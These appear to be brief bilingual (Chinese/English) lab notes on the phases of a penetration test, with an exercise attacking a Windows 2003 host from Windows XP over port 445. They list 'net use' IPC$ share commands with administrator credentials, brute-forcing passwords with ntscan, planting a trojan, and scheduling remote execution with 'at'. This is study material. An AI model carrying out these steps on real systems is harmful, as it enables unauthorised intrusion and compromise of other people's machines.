Penetration testing Process

0.授权
1.信息收集
    nslookup whois
2.扫描 vulnerablities
    namp=ip范围 端口 80(IIS,apache，什么网站)
    高级扫描
        如IIS vulnerablities 2003-IIS 6.0 2008 IIS 7.0
        扫描网站 vulnerablities
3.vulnerablities 利用

4.提权（shell environment, desktop environment,最高权限）
=========
5.clear 

实验:
    局域网内利用一台windows xp attack windows 2003

    1)  服务机配置静态IP ，然后将客户机连接进同一个网段
        检验是否ping 通
        windows xp 10.1.1.1 windows2003 10.1.1.2
    2)  445 端口 attack
        1.信息收集
            发现 target 处于 10.1.1.网段
        2.端口扫描
        可以运用telnet手动扫描端口
            download ScanPort 软件

        445 vulnerablities 利用之IPC$
            net use
            net use f: \\10.1.1.2\share 123.com /user:administrator
            net use \\10.1.1.2\ipc$ unknown /user:administrator
            net use * /del

            Brute-force attack your system password ----445
            安装 ntscan

            Make a Trojan
            copy plant a trojan

            设置任务自动执行            
                net time \\10.1.1.2
                at \\10.1.1.2 time ""